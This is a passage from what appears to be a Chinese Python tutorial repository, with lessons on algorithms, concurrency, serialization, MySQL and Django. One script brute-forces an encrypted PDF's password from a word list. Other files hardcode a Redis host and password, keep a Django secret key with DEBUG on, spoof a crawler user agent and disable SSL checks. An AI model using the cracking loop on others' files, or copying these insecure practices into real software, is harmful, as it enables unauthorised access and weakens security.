self.students[key] def main(): # students = set() # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '白元芳')) # print(len(students)) # print(students) stu = Student(1234, '骆昊') stu.gender = 'Male' # stu.birth = '1980-11-28' print(stu.name, stu.birth) school = School('千锋教育') school[1001] = Student(1001, '王大锤') school[1002] = Student(1002, '白元芳') school[1003] = Student(1003, '白洁') print(school[1002]) print(school[1003]) if __name__ == '__main__': main() File: Day16-20/code/example06.py """ 编码和解码 - BASE64 0-9A-Za-z+/ 1100 0101 1001 0011 0111 0110 00110001 00011001 00001101 00110110 base64 b64encode / b64decode ------------------------------------- 序列化和反序列化 序列化 - 将对象变成字节序列(bytes)或者字符序列(str) - 串行化/腌咸菜 反序列化 - 把字节序列或者字符序列还原成对象 Python标准库对序列化的支持: json - 字符形式的序列化 pickle - 字节形式的序列化 dumps / loads """ import base64 import json import redis from example02 import Person class PersonJsonEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ def main(): cli = redis.StrictRedis(host='120.77.222.217', port=6379, password='123123') data = base64.b64decode(cli.get('guido')) with open('guido2.jpg', 'wb') as file_stream: file_stream.write(data) # with open('guido.jpg', 'rb') as file_stream: # result = base64.b64encode(file_stream.read()) # cli.set('guido', result) # persons = [ # Person('骆昊', 39), Person('王大锤', 18), # Person('白元芳', 25), Person('狄仁杰', 37) # ] # persons = json.loads(cli.get('persons')) # print(persons) # cli.set('persons', json.dumps(persons, cls=PersonJsonEncoder)) if __name__ == '__main__': main() File: Day16-20/code/example11.py """ 变量的作用域以及Python搜索变量的顺序 LEGB: Local --> Embedded --> Global --> Built-in global - 声明或定义全局变量(要么直接使用现有的全局作用域的变量,要么定义一个变量放到全局作用域) nonlocal - 声明使用嵌套作用域的变量(如果嵌套作用域没有对应的变量直接报错) """ x = 100 def 
foo(): global x x = 200 def bar(): x = 300 print(x) bar() print(x) foo() print(x) File: Day16-20/code/example01.py """ 查找 - 顺序查找和二分查找 算法:解决问题的方法(步骤) 评价一个算法的好坏主要有两个指标:渐近时间复杂度和渐近空间复杂度,通常一个算法很难做到时间复杂度和空间复杂度都很低(因为时间和空间是不可调和的矛盾) 表示渐近时间复杂度通常使用大O标记 O(c):常量时间复杂度 - 哈希存储 / 布隆过滤器 O(log_2 n):对数时间复杂度 - 折半查找 O(n):线性时间复杂度 - 顺序查找 O(n * log_2 n):- 对数线性时间复杂度 - 高级排序算法(归并排序、快速排序) O(n ** 2):平方时间复杂度 - 简单排序算法(冒泡排序、选择排序、插入排序) O(n ** 3):立方时间复杂度 - Floyd算法 / 矩阵乘法运算 也称为多项式时间复杂度 O(2 ** n):几何级数时间复杂度 - 汉诺塔 O(3 ** n):几何级数时间复杂度 也称为指数时间复杂度 O(n!):阶乘时间复杂度 - 旅行经销商问题 - NP """ from math import log2, factorial from matplotlib import pyplot import numpy def seq_search(items: list, elem) -> int: """顺序查找""" for index, item in enumerate(items): if elem == item: return index return -1 def bin_search(items, elem): """二分查找""" start, end = 0, len(items) - 1 while start <= end: mid = (start + end) // 2 if elem > items[mid]: start = mid + 1 elif elem < items[mid]: end = mid - 1 else: return mid return -1 def main(): """主函数(程序入口)""" num = 6 styles = ['r-.', 'g-*', 'b-o', 'y-x', 'c-^', 'm-+', 'k-d'] legends = ['对数', '线性', '线性对数', '平方', '立方', '几何级数', '阶乘'] x_data = [x for x in range(1, num + 1)] y_data1 = [log2(y) for y in range(1, num + 1)] y_data2 = [y for y in range(1, num + 1)] y_data3 = [y * log2(y) for y in range(1, num + 1)] y_data4 = [y ** 2 for y in range(1, num + 1)] y_data5 = [y ** 3 for y in range(1, num + 1)] y_data6 = [3 ** y for y in range(1, num + 1)] y_data7 = [factorial(y) for y in range(1, num + 1)] y_datas = [y_data1, y_data2, y_data3, y_data4, y_data5, y_data6, y_data7] for index, y_data in enumerate(y_datas): pyplot.plot(x_data, y_data, styles[index]) pyplot.legend(legends) pyplot.xticks(numpy.arange(1, 7, step=1)) pyplot.yticks(numpy.arange(0, 751, step=50)) pyplot.show() if __name__ == '__main__': main() File: Day16-20/code/example21.py """ 多个线程竞争一个资源 - 保护临界资源 - 锁(Lock/RLock) 多个线程竞争多个资源(线程数>资源数) - 信号量(Semaphore) 多个线程的调度 - 暂停线程执行/唤醒等待中的线程 - Condition """ from concurrent.futures import ThreadPoolExecutor from random import randint from time import sleep import threading class Account(): """银行账户""" def __init__(self, balance=0): self.balance = balance lock = threading.Lock() self.condition = threading.Condition(lock) def withdraw(self, money): """取钱""" with self.condition: while money > self.balance: self.condition.wait() new_balance = self.balance - money sleep(0.001) self.balance = new_balance def deposit(self, money): """存钱""" with self.condition: new_balance = self.balance + money sleep(0.001) self.balance = new_balance self.condition.notify_all() def add_money(account): while True: money = randint(5, 10) account.deposit(money) print(threading.current_thread().name, ':', money, '====>', account.balance) sleep(0.5) def sub_money(account): while True: money = randint(10, 30) account.withdraw(money) print(threading.current_thread().name, ':', money, '<====', account.balance) sleep(1) def main(): account = Account() with ThreadPoolExecutor(max_workers=10) as pool: for _ in range(5): pool.submit(add_money, account) pool.submit(sub_money, account) if __name__ == '__main__': main() File: Day16-20/code/example15.py """ 迭代器 - __iter__ / __next__ itertools - 生成可迭代序列的工具模块 """ import itertools from math import sqrt def is_prime(num): """判断素数""" for factor in range(2, int(sqrt(num)) + 1): if num % factor == 0: return False return True class PrimeIter(object): """素数迭代器""" def __init__(self, min_value, max_value): assert 2 <= min_value <= max_value self.min_value = min_value - 1 self.max_value = max_value def __iter__(self): return 
self def __next__(self): self.min_value += 1 while self.min_value <= self.max_value: if is_prime(self.min_value): return self.min_value self.min_value += 1 raise StopIteration() class FibIter(object): """斐波那契数迭代器""" def __init__(self, num): self.num = num self.a, self.b = 0, 1 self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.num: self.a, self.b = self.b, self.a + self.b self.idx += 1 return self.a raise StopIteration() def main(): # for val in itertools.permutations('ABCD'): # print(val) # for val in itertools.combinations('ABCDE', 3): # print(val) # for val in itertools.product('黑红梅方', range(1, 14)): # print(val) # fib_iter = FibIter(20) # print('===>', next(fib_iter)) # print('===>', next(fib_iter)) # for val in fib_iter: # print(val) prime_iter = PrimeIter(2, 100000) for val in prime_iter: print(val) if __name__ == '__main__': main() File: Day16-20/code/example05.py """ 递归回溯法:叫称为试探法,按选优条件向前搜索,当搜索到某一步, 发现原先选择并不优或达不到目标时,就退回一步重新选择。 经典问题:骑士巡逻 """ import os import sys import time SIZE = 5 total = 0 def print_board(board): # os.system('clear') for row in board: for col in row: print(str(col).center(4), end='') print() def patrol(board, row, col, step=1): if row >= 0 and row < SIZE and \ col >= 0 and col < SIZE and \ board[row][col] == 0: board[row][col] = step if step == SIZE * SIZE: global total total += 1 print(f'第{total}种走法: ') print_board(board) patrol(board, row - 2, col - 1, step + 1) patrol(board, row - 1, col - 2, step + 1) patrol(board, row + 1, col - 2, step + 1) patrol(board, row + 2, col - 1, step + 1) patrol(board, row + 2, col + 1, step + 1) patrol(board, row + 1, col + 2, step + 1) patrol(board, row - 1, col + 2, step + 1) patrol(board, row - 2, col + 1, step + 1) board[row][col] = 0 def main(): board = [[0] * SIZE for _ in range(SIZE)] patrol(board, SIZE - 1, SIZE - 1) if __name__ == '__main__': main() File: Day16-20/code/example20.py """ 线程间通信(共享数据)非常简单因为可以共享同一个进程的内存 进程间通信(共享数据)比较麻烦因为操作系统会保护分配给进程的内存 要实现多进程间的通信通常可以用系统管道、套接字、三方服务来实现 multiprocessing.Queue 守护线程 - daemon thread 守护进程 - firewalld / httpd / mysqld 在系统停机的时候不保留的进程 - 不会因为进程还没有执行结束而阻碍系统停止 """ from threading import Thread from time import sleep def output(content): while True: print(content, end='') def main(): Thread(target=output, args=('Ping', ), daemon=True).start() Thread(target=output, args=('Pong', ), daemon=True).start() sleep(5) print('bye!') if __name__ == '__main__': main() File: Day16-20/code/example14.py """ 面向对象 枚举 - 一个变量的值只有有限个选择,最适合的类型就是枚举 通过枚举我们可以定义符号常量,符号常量优于字面常量 """ from enum import Enum, unique import random @unique class Suite(Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) def __lt__(self, other): return self.value < other.value class Card(): """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): return self.__str__() def __str__(self): suites = ('♠️', '♥️', '♣️', '♦️') faces = ('', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K') return f'{suites[self.suite.value]} {faces[self.face]}' class Poker(): """扑克""" def __init__(self): self.index = 0 self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] def shuffle(self): """洗牌""" self.index = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.index] self.index += 1 return card @property def has_more(self): """是否有更多的牌""" return self.index < len(self.cards) class Player(): """玩家""" def __init__(self, name): self.name = name self.cards = [] def get_card(self, card): """摸牌""" self.cards.append(card) def 
arrange(self): """整理手上的牌""" self.cards.sort(key=lambda card: (card.suite, card.face)) def main(): """主函数""" poker = Poker() poker.shuffle() players = [ Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐') ] while poker.has_more: for player in players: player.get_card(poker.deal()) for player in players: player.arrange() print(player.name, end=': ') print(player.cards) if __name__ == '__main__': main() File: Day16-20/code/example04.py """ 贪婪法:在对问题求解时,总是做出在当前看来是最好的选择, 不追求最优解,快速找到满意解。 """ class Thing(object): """物品""" def __init__(self, name, price, weight): self.name = name self.price = price self.weight = weight @property def value(self): """价格重量比""" return self.price / self.weight def input_thing(): """输入物品信息""" name_str, price_str, weight_str = input().split() return name_str, int(price_str), int(weight_str) def main(): """主函数""" max_weight, num_of_things = map(int, input().split()) all_things = [] for _ in range(num_of_things): all_things.append(Thing(*input_thing())) all_things.sort(key=lambda x: x.value, reverse=True) total_weight = 0 total_price = 0 for thing in all_things: if total_weight + thing.weight <= max_weight: print(f'小偷拿走了{thing.name}') total_weight += thing.weight total_price += thing.price print(f'总价值: {total_price}美元') if __name__ == '__main__': main() File: Day16-20/code/example10.py """ 装饰类的装饰器 - 单例模式 - 一个类只能创建出唯一的对象 上下文语法: __enter__ / __exit__ """ import threading from functools import wraps def singleton(cls): """单例装饰器""" instances = {} lock = threading.Lock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] return wrapper @singleton class President(): def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): print(President.__name__) p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') print(p1 == p2) print(p1) print(p2) if __name__ == '__main__': main() File: Day16-20/code/example24.py """ aiohttp - 异步HTTP网络访问 异步I/O(异步编程)- 只使用一个线程(单线程)来处理用户请求 用户请求一旦被接纳,剩下的都是I/O操作,通过多路I/O复用也可以达到并发的效果 这种做法与多线程相比可以让CPU利用率更高,因为没有线程切换的开销 Redis/Node.js - 单线程 + 异步I/O Celery - 将要执行的耗时间的任务异步化处理 异步I/O事件循环 - uvloop """ import asyncio import re import aiohttp async def fetch(session, url): async with session.get(url, ssl=False) as resp: return await resp.text() async def main(): pattern = re.compile(r'\<title\>(?P<title>.*)\<\/title\>') urls = ('https://www.python.org/', 'https://git-scm.com/', 'https://www.jd.com/', 'https://www.taobao.com/', 'https://www.douban.com/') async with aiohttp.ClientSession() as session: for url in urls: html = await fetch(session, url) print(pattern.search(html).group('title')) if __name__ == '__main__': loop = asyncio.get_event_loop() loop.run_until_complete(main()) loop.close() File: Day16-20/code/test_example02.py from unittest import TestCase from example02 import select_sort, merge class TestExample02(TestCase): """测试排序函数的测试用例""" def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.items1 = [12, 35, 68, 97] self.items2 = [40, 55, 73, 81] def test_merge(self): items = merge(self.items1, self.items2) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) def test_select_sort(self): """测试顺序查找""" items = select_sort(self.data1) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) File: Day36-45/code/contact/main.py """ -- 创建名为address的数据库 create database address default charset utf8; -- 切换到address数据库 use 
address; -- 创建联系人表tb_contacter create table tb_contacter ( conid int auto_increment comment '编号', conname varchar(31) not null comment '姓名', contel varchar(15) default '' comment '电话', conemail varchar(255) default'' comment '邮箱', primary key (conid) ); """ import pymysql INSERT_CONTACTER = """ insert into tb_contacter (conname, contel, conemail) values (%s, %s, %s) """ DELETE_CONTACTER = """ delete from tb_contacter where conid=%s """ UPDATE_CONTACTER = """ update tb_contacter set conname=%s, contel=%s, conemail=%s where conid=%s """ SELECT_CONTACTERS = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter limit %s offset %s """ SELECT_CONTACTERS_BY_NAME = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter where conname like %s """ COUNT_CONTACTERS = """ select count(conid) as total from tb_contacter """ class Contacter(object): def __init__(self, id, name, tel, email): self.id = id self.name = name self.tel = tel self.email = email def input_contacter_info(): name = input('姓名: ') tel = input('手机: ') email = input('邮箱: ') return name, tel, email def add_new_contacter(con): name, tel, email = input_contacter_info() try: with con.cursor() as cursor: if cursor.execute(INSERT_CONTACTER, (name, tel, email)) == 1: print('添加联系人成功!') except pymysql.MySQLError as err: print(err) print('添加联系人失败!') def delete_contacter(con, contacter): try: with con.cursor() as cursor: if cursor.execute(DELETE_CONTACTER, (contacter.id, )) == 1: print('联系人已经删除!') except pymysql.MySQLError as err: print(err) print('删除联系人失败!') def edit_contacter_info(con, contacter): name, tel, email = input_contacter_info() contacter.name = name or contacter.name contacter.tel = tel or contacter.tel contacter.email = email or contacter.email try: with con.cursor() as cursor: if cursor.execute(UPDATE_CONTACTER, (contacter.name, contacter.tel, contacter.email, contacter.id)) == 1: print('联系人信息已经更新!') except pymysql.MySQLError as err: print(err) print('更新联系人信息失败!') def show_contacter_detail(con, contacter): print('姓名:', contacter.name) print('手机号:', contacter.tel) print('邮箱:', contacter.email) choice = input('是否编辑联系人信息?(yes|no)') if choice == 'yes': edit_contacter_info(con, contacter) else: choice = input('是否删除联系人信息?(yes|no)') if choice == 'yes': delete_contacter(con, contacter) def show_search_result(con, cursor): contacters_list = [] for index, row in enumerate(cursor.fetchall()): contacter = Contacter(**row) contacters_list.append(contacter) print('[%d]: %s' % (index, contacter.name)) if len(contacters_list) > 0: choice = input('是否查看联系人详情?(yes|no)') if choice.lower() == 'yes': index = int(input('请输入编号: ')) if 0 <= index < cursor.rowcount: show_contacter_detail(con, contacters_list[index]) def find_all_contacters(con): page, size = 1, 5 try: with con.cursor() as cursor: cursor.execute(COUNT_CONTACTERS) total = cursor.fetchone()['total'] while True: cursor.execute(SELECT_CONTACTERS, (size, (page - 1) * size)) show_search_result(con, cursor) if page * size < total: choice = input('继续查看下一页?(yes|no)') if choice.lower() == 'yes': page += 1 else: break else: print('没有下一页记录!') break except pymysql.MySQLError as err: print(err) def find_contacters_by_name(con): name = input('联系人姓名: ') try: with con.cursor() as cursor: cursor.execute(SELECT_CONTACTERS_BY_NAME, ('%' + name + '%', )) show_search_result(con, cursor) except pymysql.MySQLError as err: print(err) def find_contacters(con): while True: print('1. 查看所有联系人') print('2. 搜索联系人') print('3. 
退出查找') choice = int(input('请输入: ')) if choice == 1: find_all_contacters(con) elif choice == 2: find_contacters_by_name(con) elif choice == 3: break def main(): con = pymysql.connect(host='1.2.3.4', port=3306, user='yourname', passwd='yourpass', db='address', charset='utf8', autocommit=True, cursorclass=pymysql.cursors.DictCursor) while True: print('=====通讯录=====') print('1. 新建联系人') print('2. 查找联系人') print('3. 退出系统') print('===============') choice = int(input('请选择: ')) if choice == 1: add_new_contacter(con) elif choice == 2: find_contacters(con) elif choice == 3: con.close() print('谢谢使用, 再见!') break if __name__ == '__main__': main() File: Day46-60/code/hellodjango/manage.py #!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main() File: Day46-60/code/hellodjango/first/models.py from django.db import models # Create your models here. File: Day46-60/code/hellodjango/first/__init__.py File: Day46-60/code/hellodjango/first/apps.py from django.apps import AppConfig class FirstConfig(AppConfig): name = 'first' File: Day46-60/code/hellodjango/first/admin.py from django.contrib import admin # Register your models here. File: Day46-60/code/hellodjango/first/tests.py from django.test import TestCase # Create your tests here. File: Day46-60/code/hellodjango/first/views.py from random import sample from django.shortcuts import render def show_index(request): fruits = [ 'Apple', 'Orange', 'Pitaya', 'Durian', 'Waxberry', 'Blueberry', 'Grape', 'Peach', 'Pear', 'Banana', 'Watermelon', 'Mango' ] return render(request, 'index.html', {'fruits': sample(fruits, 3)}) File: Day46-60/code/hellodjango/first/migrations/__init__.py File: Day46-60/code/hellodjango/hellodjango/__init__.py File: Day46-60/code/hellodjango/hellodjango/settings.py """ Django settings for hellodjango project. Generated by 'django-admin startproject' using Django 2.2.13. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'x)q$(0m0^ttqii@^zn^9bdbh&%l$)wzjm=nv&_y+^y9e!37=-z' # SECURITY WARNING: don't run with debug turned on in production! 
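# For a production deployment, set DEBUG = False and list the site's public host names in ALLOWED_HOSTS.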
DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'hellodjango.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'hellodjango.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/' File: Day46-60/code/hellodjango/hellodjango/urls.py """hellodjango URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from first.views import show_index urlpatterns = [ path('admin/', admin.site.urls), path('hello/', show_index), ] File: Day46-60/code/hellodjango/hellodjango/wsgi.py """ WSGI config for hellodjango project. It exposes the WSGI callable as a module-level variable named ``application``. 
For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') application = get_wsgi_application() File: 番外篇/code/test03.py from random import randint, sample # 初始化备选红色球 red_balls = [x for x in range(1, 34)] # 选出六个红色球 selected_balls = sample(red_balls, 6) # 对红色球进行排序 selected_balls.sort() # 添加一个蓝色球 selected_balls.append(randint(1, 16)) # 输出选中的随机号码 for index, ball in enumerate(selected_balls): print('%02d' % ball, end=' ') if index == len(selected_balls) - 2: print('|', end=' ') print() File: 番外篇/code/test02.py print(sum(range(1, 101))) File: 番外篇/code/test.py def merge(items1, items2): items3 = [] index1, index2 = 0, 0 while index1 < len(items1) and index2 < len(items2): if items1[index1] < items2[index2]: items3.append(items1[index1]) index1 += 1 else: items3.append(items2[index2]) index2 += 1 items3 += items1[index1:] items3 += items2[index2:] return items3 File: 番外篇/code/test01.py print('hello, world!') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example03.py a, b = 0, 1 for num in range(1, 101): a, b = b, a + b print(f'{num}: {a}') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example02.py nums = [] for i in range(100000): nums.insert(0, i) print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example06.py import re import PyPDF2 with open('Python_Tricks_encrypted.pdf', 'rb') as pdf_file_stream: reader = PyPDF2.PdfFileReader(pdf_file_stream) with open('dictionary.txt', 'r') as txt_file_stream: file_iter = iter(lambda: txt_file_stream.readline(), '') for word in file_iter: word = re.sub(r'\s', '', word) if reader.decrypt(word): print(word) break File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example01.py nums = [] for i in range(100000): nums.append(i) nums.reverse() print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example05.py """ 公鸡5元一只,母鸡3元一只,小鸡1元三只,用100元买一百只鸡,问公鸡、母鸡、小鸡各有多少只?
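The brute-force solution below enumerates the number of roosters x (0-20) and hens y (0-33), sets the number of chicks to z = 100 - x - y, and keeps only the combinations where z is divisible by 3 and 5*x + 3*y + z//3 == 100.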
""" for x in range(21): for y in range(34): z = 100 - x - y if z % 3 == 0 and 5 * x + 3 * y + z // 3 == 100: print(x, y, z) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example04.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for num in range(1, 101): print(f'{num}: {fib(num)}') File: 公开课/文档/第04次公开课-好玩的Python/code/example01.py from PIL import Image, ImageFilter chiling = Image.open('resources/chiling.jpg') width, height = chiling.size chiling.show() chiling.transpose(Image.FLIP_LEFT_RIGHT).show() chiling.filter(ImageFilter.GaussianBlur(4)).show() chiling.filter(ImageFilter.EMBOSS).show() chiling.thumbnail((width // 4, height // 4)) chiling.show() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example09.py import copy class PrototypeMeta(type): def __init__(cls, *args, **kwargs): super().__init__(*args, **kwargs) cls.clone = lambda self, is_deep=True: \ copy.deepcopy(self) if is_deep else copy.copy(self) class Student(metaclass=PrototypeMeta): pass stu1 = Student() stu2 = stu1.clone() print(stu1 == stu2) print(id(stu1), id(stu2)) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example08.py from functools import wraps from threading import RLock def singleton(cls): instances = {} lock = RLock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] @singleton class President: pass President = President.__wrapped__ File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example07.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for n in range(1, 121): print(f'{n}: {fib(n)}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example03.py values = [True] * 10 print(values) numbers = [x for x in range(1, 11)] print(numbers) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example02.py print(sum(range(1, 101))) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example06.py # 一行代码实现求阶乘函数 fac = lambda x: __import__('functools').reduce(int.__mul__, range(1, x + 1), 1) print(fac(5)) # 一行代码实现求最大公约数函数 gcd = lambda x, y: y % x and gcd(y % x, x) or x print(gcd(15, 27)) # 一行代码实现判断素数的函数 is_prime = lambda x: x > 1 and not [f for f in range(2, int(x ** 0.5) + 1) if x % f == 0] for num in range(2, 100): if is_prime(num): print(num, end=' ') print() # 一行代码实现快速排序 quick_sort = lambda items: len(items) and quick_sort([x for x in items[1:] if x < items[0]]) \ + [items[0]] + quick_sort([x for x in items[1:] if x > items[0]]) \ or items items = [57, 12, 35, 68, 99, 81, 70, 22] print(quick_sort(items)) # 生成FizzBuzz列表 # 1 2 Fizz 4 Buzz 6 ... 14 ... FizzBuzz 16 ... 
100 print(['Fizz'[x % 3 * 4:] + 'Buzz'[x % 5 * 4:] or x for x in range(1, 101)]) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example01.py print('hello, world') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example05.py from http.server import HTTPServer, SimpleHTTPRequestHandler class RequestHandler(SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write('<h1>goodbye, world</h1>'.encode()) server = HTTPServer(('', 8000), RequestHandler) server.serve_forever() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example04.py from random import randint, sample def generate(): """生成一组随机号码""" red_balls = [x for x in range(1, 34)] selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def display(balls): """输出一组双色球号码""" for index, ball in enumerate(balls): print(f'{ball:0>2d}', end=' ') if index == len(balls) - 2: print('|', end=' ') print() num = int(input('机选几注: ')) for _ in range(num): display(generate()) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example10.py import random import time import requests from bs4 import BeautifulSoup for page in range(10): resp = requests.get( url=f'https://movie.douban.com/top250?start={25 * page}', headers={'User-Agent': 'BaiduSpider'} ) soup = BeautifulSoup(resp.text, "lxml") for elem in soup.select('a > span.title:nth-child(1)'): print(elem.text) time.sleep(random.random() * 5) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom04.py fruits = ['orange', 'grape', 'pitaya', 'blueberry'] # index = 0 # for fruit in fruits: # print(index, ':', fruit) # index += 1 for index, fruit in enumerate(fruits): print(index, ':', fruit) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom05.py data = [7, 20, 3, 15, 11] # result = [] # for i in data: # if i > 10: # result.append(i * 3) result = [num * 3 for num in data if num > 10] print(result) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom01.py name = 'jackfrued' fruits = ['apple', 'orange', 'grape'] owners = {'name': '骆昊', 'age': 40, 'gender': True} # if name != '' and len(fruits) > 0 and len(owners.keys()) > 0: # print('Jackfrued love fruits.') if name and fruits and owners: print('Jackfrued love fruits.') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom06.py data = {'x': '5'} # if 'x' in data and isinstance(data['x'], (str, int, float)) \ # and data['x'].isdigit(): # value = int(data['x']) # print(value) # else: # value = None try: value = int(data['x']) print(value) except (KeyError, TypeError, ValueError): value = None File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom02.py a, b = 5, 10 # temp = a # a = b # b = a a, b = b, a print(f'a = {a}, b = {b}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom03.py chars = ['j', 'a', 'c', 'k', 'f', 'r', 'u', 'e', 'd'] # name = '' # for char in chars: # name += char name = ''.join(chars) print(name) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part04/example.py import cProfile # @profile def is_prime(num): for factor in range(2, int(num ** 0.5) + 1): if num % factor == 0: return False return True class PrimeIter: def __init__(self, total): self.counter = 0 self.current = 1 self.total = total def __iter__(self): return self def __next__(self): if self.counter < self.total: self.current += 1 while not is_prime(self.current): self.current += 1 self.counter += 1 
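            # at this point self.current holds the next prime and has already
            # been counted, so hand it back to the caller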
